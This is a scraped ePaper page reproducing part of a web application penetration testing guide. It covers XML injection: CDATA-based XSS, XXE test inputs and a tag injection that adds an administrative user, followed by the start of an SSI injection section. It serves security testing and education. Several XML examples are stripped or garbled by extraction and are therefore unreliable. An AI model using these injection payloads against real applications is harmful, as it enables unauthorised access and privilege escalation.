1BO4r2U
1BO4r2U
1BO4r2U
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
133 134<br />
Web Application Penetration Testing<br />
Web Application Penetration Testing<br />
userName = ]]><br />
this will become:<br />
]]><br />
which is not a valid XML fragment.<br />
Another test is related to CDATA tag. Suppose that the XML document<br />
is processed to generate an HTML page. In this case, the CDATA section<br />
delimiters may be simply eliminated, without further inspecting<br />
their contents. Then, it is possible to inject HTML tags, which will be<br />
included in the generated page, completely bypassing existing sanitization<br />
routines.<br />
Let’s consider a concrete example. Suppose we have a node containing<br />
some text that will be displayed back to the user.<br />
<br />
$HTMLCode<br />
<br />
Then, an attacker can provide the following input:<br />
$HTMLCode = script]]>alert(‘xss’)/script]]><br />
and obtain the following node:<br />
<br />
script]]>alert(‘xss’)/<br />
script]]><br />
<br />
During the processing, the CDATA section delimiters are eliminated,<br />
generating the following HTML code:<br />
alert(‘XSS’)<br />
The result is that the application is vulnerable to XSS.<br />
External Entity:<br />
The set of valid entities can be extended by defining new entities. If<br />
the definition of an entity is a URI, the entity is called an external entity.<br />
Unless configured to do otherwise, external entities force the XML<br />
parser to access the resource specified by the URI, e.g., a file on the<br />
local machine or on a remote systems. This behavior exposes the application<br />
to XML eXternal Entity (XXE) attacks, which can be used to<br />
perform denial of service of the local system, gain unauthorized access<br />
to files on the local machine, scan remote machines, and perform<br />
denial of service of remote systems.<br />
To test for XXE vulnerabilities, one can use the following input:<br />
<br />
]>&xxe;<br />
This test could crash the web server (on a UNIX system), if the XML<br />
parser attempts to substitute the entity with the contents of the /dev/<br />
random file.<br />
Other useful tests are the following:<br />
<br />
]>&xxe;<br />
<br />
]>&xxe;<br />
<br />
]>&xxe;<br />
<br />
]>&xxe;<br />
Tag Injection<br />
Once the first step is accomplished, the tester will have some information<br />
about the structure of the XML document. Then, it is possible<br />
to try to inject XML data and tags. We will show an example of how<br />
this can lead to a privilege escalation attack.<br />
Let’s considering the previous application. By inserting the following<br />
values:<br />
Username: tony<br />
Password: Un6R34kb!e<br />
E-mail: s4tan@hell.com0s4tan@hell.com<br />
the application will build a new node and append it to the XML database:<br />
<br />
<br />
<br />
gandalf<br />
!c3<br />
0<br />
gandalf@middleearth.com<br />
<br />
<br />
Stefan0<br />
w1s3c<br />
500<br />
Stefan0@whysec.hmm<br />
<br />
<br />
tony<br />
Un6R34kb!e<br />
500<br />
s4tan@hell.com0s4tan@hell.com<br />
<br />
<br />
The resulting XML file is well formed. Furthermore, it is likely that,<br />
for the user tony, the value associated with the userid tag is the<br />
one appearing last, i.e., 0 (the admin ID). In other words, we have<br />
injected a user with administrative privileges.<br />
The only problem is that the userid tag appears twice in the last<br />
user node. Often, XML documents are associated with a schema<br />
or a DTD and will be rejected if they don’t comply with it.<br />
Let’s suppose that the XML document is specified by the following<br />
DTD:<br />
<br />
<br />
<br />
<br />
<br />
]><br />
Note that the userid node is defined with cardinality 1. In this case,<br />
the attack we have shown before (and other simple attacks) will<br />
not work, if the XML document is validated against its DTD before<br />
any processing occurs.<br />
However, this problem can be solved, if the tester controls the value<br />
of some nodes preceding the offending node (userid, in this example).<br />
In fact, the tester can comment out such node, by injecting<br />
a comment start/end sequence:<br />
Username: tony<br />
Password: Un6R34kb!e0s4tan@hell.com<br />
In this case, the final XML database is:<br />
<br />
<br />
<br />
gandalf<br />
!c3<br />
0<br />
gandalf@middleearth.com<br />
<br />
<br />
Stefan0<br />
w1s3c<br />
500<br />
Stefan0@whysec.hmm<br />
<br />
<br />
tony<br />
Un6R34kb!e0s4tan@hell.com<br />
<br />
<br />
The original userid node has been commented out, leaving only the<br />
injected one. The document now complies with its DTD rules.<br />
Tools<br />
• XML Injection Fuzz Strings (from wfuzz tool) - https:/wfuzz.googlecode.com/svn/trunk/wordlist/Injections/XML.txt<br />
References<br />
Whitepapers<br />
• Alex Stamos: “Attacking Web Services” - http:/www.owasp.org/images/d/d1/AppSec2005DC-Alex_Stamos-Attacking_Web_Services.<br />
ppt<br />
• Gregory Steuck, “XXE (Xml eXternal Entity) attack”, http:/www.securityfocus.com/archive/1/297714<br />
Testing for SSI Injection (OTG-INPVAL-009)<br />
Summary<br />
Web servers usually give developers the ability to add small pieces of<br />
dynamic code inside static HTML pages, without having to deal with<br />
full-fledged server-side or client-side languages. This feature is incarnated<br />
by the Server-Side Includes (SSI). In SSI injection testing, we test<br />
if it is possible to inject into the application data that will be interpreted<br />
by SSI mechanisms. A successful exploitation of this vulnerability<br />
allows an attacker to inject code into HTML pages or even perform<br />
remote code execution.<br />
Server-Side Includes are directives that the web server parses before